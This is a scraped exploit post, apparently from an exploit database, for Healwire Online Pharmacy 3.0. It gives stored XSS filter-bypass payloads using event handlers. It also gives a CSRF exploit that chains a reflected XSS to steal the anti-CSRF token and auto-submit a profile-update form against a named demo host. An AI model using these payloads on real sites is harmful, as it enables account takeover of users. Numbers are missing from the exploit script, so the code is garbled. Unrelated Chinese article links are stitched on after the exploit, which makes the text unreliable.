Healwire Online Pharmacy version 3.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploitvulnerabilityxsscsrf

MD5 | 9196695291014c0d67db9bdd80d678ff

# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

# Date: --

# Exploit Author: L0RD

# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499

# Version: 3.0

# Tested on: windows

# POC  : Cross site scripting :

) Create an account and go to your profile.

) When we want to put "<script></script>" in the fields,"script" will be

replaced with null.

so we can bypass this filter by using javascript's events like

"onmouseover" or "oninput" .

Put one of these payloads into the fields :

 - " oninput=alert('xss') "

 - " onmouseover=alert('xss') "

) You will get an alert box inside the page . ( after put something into

the fields or move mouse on the fields)

# POC  : Cross-Site request forgery :

# With csrf vulnerability,attacker can easily change user's authentication.

# So in this script , we have anti-CSRF token .We can't change user's

# information without token.

# but there is a vulnerable parameter which has reflected xss in another page

# of this script.

# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here]

# Now we can bypass anti-csrf by this parameter and using javascript:

# Exploit :

"/><form action="

http://store.webandcrafts.com/demo/healwire/user/update-details-user/1"

method="POST">

<input type="hidden" name="first_name" value="a" />

<input type="hidden" name="address"

value="" oninput=alert(document.domain) ""

/>

<input type="hidden" name="pincode" value="a" />

<input type="hidden" name="phone" value="" />

<input type="hidden" name="last_name" value="anything" />

<input type="hidden" name="_token" value="" />

</form>

<script>

var token = ' ';

var req = new XMLHttpRequest();

req.onreadystatechange = function(){

if(this.readyState ==  && this.status == ){

var secPage = this.responseXML;

token = secPage.forms[].elements[].value;

console.log(token);

}

}

req.open("GET","/demo/healwire/account-page",true);

req.responseType = "document";

req.send();

window.setTimeout(function(){

document.forms[].elements[].value = token;

document.forms[].submit();

},)

</script>

# You can also send  ajax requests instead of using form .

# Encode this payload and put this into "msg" parameter

# JSON result after  seconds :

status "SUCCESS"

msg "User profile updated !"

Healwire Online Pharmacy 3.0 Cross Site Request Forgery / Cross Site Scripting的更多相关文章

  1. WebGoat学习——跨站请求伪造(Cross Site Request Forgery (CSRF))

    跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Site Request Forgery (CSRF))也被称为:one click at ...

  2. Cross Site Request Forgery (CSRF)--spring security -转

    http://docs.spring.io/spring-security/site/docs/3.2.0.CI-SNAPSHOT/reference/html/csrf.html 13. Cross ...

  3. 跨站请求伪造(Cross Site Request Forgery (CSRF))

    跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Sit ...

  4. DVWA 黑客攻防演练(十四)CSRF 攻击 Cross Site Request Forgery

    这么多攻击中,CSRF 攻击,全称是 Cross Site Request Forgery,翻译过来是跨站请求伪造可谓是最防不胜防之一.比如删除一篇文章,添加一笔钱之类,如果开发者是没有考虑到会被 C ...

  5. CSRF(Cross Site Request Forgery, 跨站域请求伪造)

    CSRF(Cross Site Request Forgery, 跨站域请求伪造) CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的 ...

  6. CSRF(Cross Site Request Forgery, 跨站请求伪造)

    一.CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一.其他安全隐患, ...

  7. 转: CSRF(Cross Site Request Forgery 跨站域请求伪造) 背景与介绍

    from:  https://www.ibm.com/developerworks/cn/web/1102_niugang_csrf/   在 IBM Bluemix 云平台上开发并部署您的下一个应用 ...

  8. CSRF Laravel Cross Site Request Forgery protection¶

    Laravel 使得防止应用 遭到跨站请求伪造攻击变得简单. Laravel 自动为每一个被应用管理的有效用户会话生成一个 CSRF "令牌",该令牌用于验证授权用 户和发起请求者 ...

  9. Vulnerability: Cross Site Request Forgery (CSRF)

    CSRF跨站请求伪造 这是一种网络攻击方式,也被称为one-click attack或者session riding 攻击原理 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web ...

随机推荐

  1. jvm性能优化及内存分区

     jvm性能优化及内存分区 2012-09-17 15:51:37 分类: Java Some of the default values for Sun JVMs are listed below. ...

  2. RocketMQ源码 — 七、 RocketMQ高可用(2)

    上一篇说明了RocketMQ怎么支持broker集群的,这里接着说RocketMQ实现高可用的手段之一--冗余. RocketMQ部署的时候一个broker set会有一个mater和一个或者多个sl ...

  3. Go碎碎念

    1. 时间类型转换为字符串类型 now := time.Now() fmt.Println(now.Format("2006-01-02 03:04:05 PM")) yester ...

  4. 电商网站开发记录(三) Spring的引入,以及配置详解

    1.web.xml配置注解<?xml version="1.0" encoding="UTF-8"?><web-app xmlns:xsi=& ...

  5. windows环境下zookeeper安装和使用

    一.简介        zooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件.它是一个为分布式应用提供一 ...

  6. Android layout_margin 无效的解决办法

    http://www.aichengxu.com/view/31025 1.如果LinearLayout中使用Android:layout_marginRight不起作用,通过测试原来在android ...

  7. RabbitMQ在windows系统安装部署文档

    1.RabbitMQ简介 MQ全称为Message Queue, 消息队列(MQ)是一种应用程序对应用程序的通信方法.应用程序通过读写出入队列的消息(针对应用程序的数据)来通信,而无需专用连接来链接它 ...

  8. Tomcat PermGen space的解决方案

    Tomcat报告 Caused by: java.lang.OutOfMemoryError: PermGen space异常 内存溢出PermGen space的全称是Permanent Gener ...

  9. 团队项目第二阶段个人进展——Day5

    一.昨天工作总结 冲刺第五天,找到了一个专门的提供后端数据服务的网站:leancloud,并学习了相关操作 二.遇到的问题 对leancloud的数据如何请求和响应不懂 三.今日工作规划 深入学习le ...

  10. 条件随机场CRF(三) 模型学习与维特比算法解码

    条件随机场CRF(一)从随机场到线性链条件随机场 条件随机场CRF(二) 前向后向算法评估标记序列概率 条件随机场CRF(三) 模型学习与维特比算法解码 在CRF系列的前两篇,我们总结了CRF的模型基 ...